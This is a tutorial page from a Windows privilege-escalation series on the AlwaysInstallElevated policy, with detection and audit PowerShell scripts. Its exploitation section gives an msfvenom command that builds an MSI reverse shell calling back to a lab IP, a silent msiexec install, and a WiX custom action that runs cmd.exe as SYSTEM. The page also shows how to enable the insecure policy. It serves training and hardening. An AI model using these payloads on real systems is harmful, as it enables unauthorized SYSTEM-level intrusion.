# 10 - Always Install Elevated

#### Topics

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **Always Install with Elevated Privileges**

The **"Always Install with Elevated Privileges"** policy (`AlwaysInstallElevated`) makes Windows Installer run `.msi` packages with elevated permissions, even when the user starting the installation is not an administrator. The setting exists under both **Computer Configuration** and **User Configuration**, and it takes effect only when it is enabled in both.

**Security Risks**

* Malicious actors can exploit this setting to execute arbitrary code during software installation.
* If enabled, it creates a significant security vulnerability, potentially leading to privilege escalation.

***

## **Configuration Check**

### **Using Group Policy Editor**

You can check this setting in the **Group Policy Editor** (`gpedit.msc`):

1. Navigate to:
   * **Computer Configuration** → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges."
   * **User Configuration** → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges."
2. Ensure the policy is **disabled** to prevent misuse.

### **Using PowerShell**

To verify the configuration via PowerShell:

```powershell
Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
```

If both values are set to `1`, the policy is active. An error stating that the path or property does not exist means the value is not set in that hive.
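The same check extended to every loaded user hive, as an added example that is not part of the original page. The function names `Get-AieValue` and `Test-AlwaysInstallElevated` are illustrative, and reading other users' hives under `HKEY_USERS` requires an elevated session:

```powershell
# Added example: audit AlwaysInstallElevated in HKLM and in each loaded user hive.
function Get-AieValue {
    param([string]$KeyPath)
    # Returns the DWORD value, or $null when the key or the value is absent.
    $item = Get-ItemProperty -Path $KeyPath -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { $null }
}

function Test-AlwaysInstallElevated {
    $sub     = 'Software\Policies\Microsoft\Windows\Installer'
    $machine = Get-AieValue "Registry::HKEY_LOCAL_MACHINE\$sub"

    # HKEY_USERS has one subkey per loaded profile; the *_Classes hives are skipped.
    $sids = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notlike '*_Classes' } |
        Select-Object -ExpandProperty PSChildName

    foreach ($sid in $sids) {
        $user = Get-AieValue "Registry::HKEY_USERS\$sid\$sub"
        [pscustomobject]@{
            Sid          = $sid
            MachineValue = $machine   # empty = not configured
            UserValue    = $user      # empty = not configured or hive not readable
            Exposed      = ($machine -eq 1 -and $user -eq 1)  # policy active for this user
        }
    }
}

Test-AlwaysInstallElevated | Format-Table -AutoSize
```

Any row with `Exposed` set to `True` identifies an account for which the policy is active in both hives.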

**Set the Policy**

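To enable or disable the policy via PowerShell (writing to HKLM requires an elevated session, and `Set-ItemProperty` fails if the `Installer` policy key does not exist yet):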

```powershell
# Enable the policy (dangerous)
Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 1
Set-ItemProperty -Path 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 1

# Disable the policy (recommended)
Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 0
Set-ItemProperty -Path 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 0
```

***

## **Exploitation**

If this policy is enabled, attackers can generate and install a malicious Microsoft Software Installer (`.msi`) package to gain elevated privileges.

**Generate Malicious MSI with msfvenom**

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f msi > sample.msi
```

**Install the Malicious Package**

```cmd
msiexec /quiet /qn /i sample.msi
```

This executes the payload embedded in the MSI file with elevated privileges.

***

## **Creating a Custom MSI**

Instead of using `msfvenom`, you can create a custom MSI with the **WiX Toolset** to execute specific commands or scripts during installation.

### **Steps to Create a Custom MSI**

1. **Download WiX Toolset**
   * Download WiX v3.14.1 from [WiX Releases](https://github.com/wixtoolset/wix3/releases/tag/wix3141rtm).
2. **Install and Update PATH**\
   Add WiX binaries to your system path:

   ```cmd
   set PATH=%PATH%;"C:\Program Files (x86)\WiX Toolset v3.14\bin"
   ```
3. **Create the WiX Project File**\
   Example `sample.wxs` file:

   ```xml
   <?xml version="1.0"?>
   <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
     <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
              Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
       <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
       <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
       <Directory Id="TARGETDIR" Name="SourceDir">
         <Directory Id="ProgramFilesFolder">
           <Directory Id="INSTALLLOCATION" Name="Example">
             <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
             </Component>
           </Directory>
         </Directory>
       </Directory>
       <Feature Id="DefaultFeature" Level="1">
         <ComponentRef Id="ApplicationFiles"/>
       </Feature>
       <Property Id="cmdline">cmd.exe /C whoami /groups > C:\Users\Quickemu\Desktop\test.txt</Property>
       <CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
       <CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
         fail_here
       </CustomAction>
       <InstallExecuteSequence>
         <Custom Action="Stage1" After="InstallInitialize"></Custom>
         <Custom Action="Stage2" Before="InstallFiles"></Custom>
       </InstallExecuteSequence>
     </Product>
   </Wix>
   ```
4. **Compile the WiX Project**\
   Convert the `.wxs` file into a `.wixobj` and then into an MSI file:

   ```cmd
   candle sample.wxs
   light.exe sample.wixobj
   ```
5. **Execute the Custom MSI**

   ```cmd
   msiexec /quiet /qn /i sample.msi
   ```

***

## **Recommendations**

* **Disable the Policy**: Ensure the `Always Install with Elevated Privileges` policy is disabled in both **HKLM** and **HKCU**.
* **Audit Installer Files**: Regularly review MSI packages for malicious content.
* **Restrict Permissions**: Limit access to installer execution to trusted users only.
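
One way to carry out the "Audit Installer Files" recommendation, as an added example that is not part of the original page: it reads the `CustomAction` table of a package and flags actions that are deferred and do not impersonate the user, which is the combination WiX emits for `Execute="deferred"` with `Impersonate="no"` as in the `sample.wxs` above. The function names and the package path in the usage comment are illustrative.

```powershell
# Added example: list MSI custom actions that run deferred without impersonation.
function Invoke-Com {
    param($Object, [string]$Name, [System.Reflection.BindingFlags]$Kind, [object[]]$ArgList)
    # The WindowsInstaller COM objects are called late-bound through InvokeMember.
    $Object.GetType().InvokeMember($Name, $Kind, $null, $Object, $ArgList)
}

function Get-MsiElevatedAction {
    param([Parameter(Mandatory)][string]$Path)

    $inScript      = 0x400   # msidbCustomActionTypeInScript: deferred execution
    $noImpersonate = 0x800   # msidbCustomActionTypeNoImpersonate: no user impersonation

    $installer = New-Object -ComObject WindowsInstaller.Installer
    $fullPath  = (Resolve-Path -LiteralPath $Path).Path
    $db = Invoke-Com $installer 'OpenDatabase' 'InvokeMethod' @($fullPath, 0)  # 0 = read-only

    try {
        $query = 'SELECT `Action`,`Type`,`Source`,`Target` FROM `CustomAction`'
        $view  = Invoke-Com $db 'OpenView' 'InvokeMethod' @($query)
    } catch {
        return   # the package has no CustomAction table
    }
    Invoke-Com $view 'Execute' 'InvokeMethod' $null

    # Fetch returns $null once all rows have been read.
    while ($null -ne ($rec = Invoke-Com $view 'Fetch' 'InvokeMethod' $null)) {
        $type = [int](Invoke-Com $rec 'IntegerData' 'GetProperty' 2)
        [pscustomobject]@{
            Action                = Invoke-Com $rec 'StringData' 'GetProperty' 1
            Type                  = '0x{0:X}' -f $type
            DeferredNoImpersonate = (($type -band $inScript) -and ($type -band $noImpersonate))
            Source                = Invoke-Com $rec 'StringData' 'GetProperty' 3
            Target                = Invoke-Com $rec 'StringData' 'GetProperty' 4
        }
    }
}

# Usage (hypothetical path to a package under review):
# Get-MsiElevatedAction -Path .\package.msi | Format-Table -AutoSize
```

Rows with `DeferredNoImpersonate` set to `True` run in the installer service's context when the installation is elevated, so their `Source` and `Target` columns are the first thing to review.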

***

## Other Resources

* [WiX Toolset Official Site](https://wixtoolset.org/)
* [WiX Elevated Install Guide](https://www.add-in-express.com/forum/read.php?FID=5&TID=13992)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization! ❗**
{% endhint %}


